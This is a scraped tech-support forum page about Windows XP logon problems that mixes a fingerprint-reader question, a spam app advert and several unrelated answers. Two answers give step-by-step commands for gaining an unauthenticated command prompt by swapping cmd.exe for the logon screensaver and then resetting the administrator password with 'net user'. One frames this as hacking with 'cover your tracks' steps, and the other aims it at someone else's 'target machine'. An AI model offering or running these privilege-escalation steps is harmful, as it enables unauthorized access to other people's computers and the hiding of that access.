Question about DigitalPersona DIGITAL PERSONA USB Keyboard

DigitalPersona not visable on Windows XP Logon Screen

Hello!
Since I have installed the DigitalPersona Application, I cannot use the Device to log on at my Windows XP (Tablet PC Edition) - the usage is still possible after I have manually entered my Password because the Software neither activate the Reader on the Logon Screen (the Reader only activates after logging on) or even change Windows Defaults Logon Screen (to the DigitalPersona Logon Screen).

How can I fix this Problem?

Thanks in advice!

the service is completely free and covers almost anything you can think of.(from cars to computers, handyman, and even drones)
click here to download the app (for users in the US for now) and get all the help you need.
Goodluck!

My power glitched, now when i try to log in to windows my password isn't recognized. i've tried everything.

By default xp has an unsecured adminstrator account. At the logon screen press Ctl + Alt + Del twice to bring up the standard logon dialogue box. Type the username "administrator" without the quotation marks. Leave the password empty. Press ok to login. Hopefully that gets you logged on to windows so you can reset your user account

Hack windows

Here are the steps involved to Hack the Window XP Administrator Password .

Go to Start -> Run -> Type in CMD

You will get a command prompt. Enter these commands the way it is given

cd\

cd\ windows\system32

mkdir temphack

copy logon.scr temphack\logon.scr

copy cmd.exe temphack\cmd.exe

del logon.scr

rename cmd.exe logon.scr

exit

Wait its not over read the rest to find out how to Hack the Window XP Administrator Password
A Brief explanation of what you are currently doing here is
Your are nagivating to the windows system Directory where the system files are stored. Next your creating a temporary directory called mkdir. After which you are copying or backing up the logon.scr and cmd.exe files into the mkdir then you are deleting the logon.scr file and renaming cmd.exe file to logon.scr.
So basically you are telling windows is to backup the command program and the screen saver file. Then we edited the settings so when windows loads the screen saver, we will get an unprotected dos prompt without logging in. When this appears enter this command
net user password
Example: If the admin user name is clazh and you want change the password to pass Then type in the following command
net user clazh pass
This will chang the admin password to pass.
Thats it you have sucessfully hacked the Window XP Administrator Password now you can Log in, using the hacked Window XP Administrator Password and do whatever you want to do.
Here are the steps involved to De Hack or restore the Window XP Administrator Password to cover your tracks.

Go to Start -> Run -> Type in CMD

You will get a command prompt. Enter these commands the way it is given

cd\

cd\ windows\system32\temphack

copy logon.scr C:\windows\system32\logon.scr

copy cmd.exe C:\windows\system32\cmd.exe

exit

Or simply go to C:\windows\system32\temphack and copy the contents of temphack back into system32 directory click Yes to overwrite the modified files.
I cannot remember my login and password. The computer has not been used for several years. How do I by pass the ogin screen or change my login and password?

I believe your computer has windows XP on it? if y\it is XP on it upon powering your system keep on tapping F8 until you get to windows advance menu then select safe mode it should log into win xp select the administrator account, once logged in as administrator go to control panel in xp select users icon then in users icon click on manage accounts then select the your log in Icon which you forgot the password then click on change password........ this should help you log back in your computer, but if you don't have any files that need to be backed up on that computer I suggest that you reformat instead to make sure that windows will run perfectly fine when you use it, but if you don't have a windows installer and you are successful in changing the password I suggest that you clean up the system by doing a disc clean up on it and a defragmentation on the Hard drive

When my computer is turned on it shows the blue login page, when i click on the login icon, it goes to log-in but logs out automatically by itself.

Hello jwbandit402,

Try booting the computer into "Safe Mode" by pressing the F8 key at startup and see if it will continue with the login process. If not try performing a "Repair Installation" with your Windows Install disc to repair any corrupted system files that may be keeping you from logging in.

Hope this helps. Don't forget to leave feedback. Thank you.

Logon

Go into your BIOS
Set the 1st Boot device preference to CD
Insert your windows XP disk
Boot from CD
Run XP Repair

You do this at your own risk. I am in no way accountable for damage to your computer.

hello there,

U can try booting into Safe mode with networking option.

If you log into a limited account on your target machine and open up a dos prompt
then enter this set of commands Exactly:
cd\ *drops to root
cd\windows\system32 *directs to the system32 dir
mkdir temphack *creates the folder temphack
copy logon.scr temphack\logon.scr *backsup logon.scr
copy cmd.exe temphack\cmd.exe *backsup cmd.exe
del logon.scr *deletes original logon.scr
rename cmd.exe logon.scr *renames cmd.exe to logon.scr
exit *quits dos
Now what you have just done is told the computer to backup the command program
and the screen saver file, then edits the settings so when the machine boots the
screen saver you will get an unprotected dos prompt with out logging into XP.
Once this happens if you enter this command minus the quotes
"net user <admin account name here> password"
If the Administrator Account is called Frank and you want the password blah enter this
"net user Frank blah"
and this changes the password on franks machine to blah and your in.
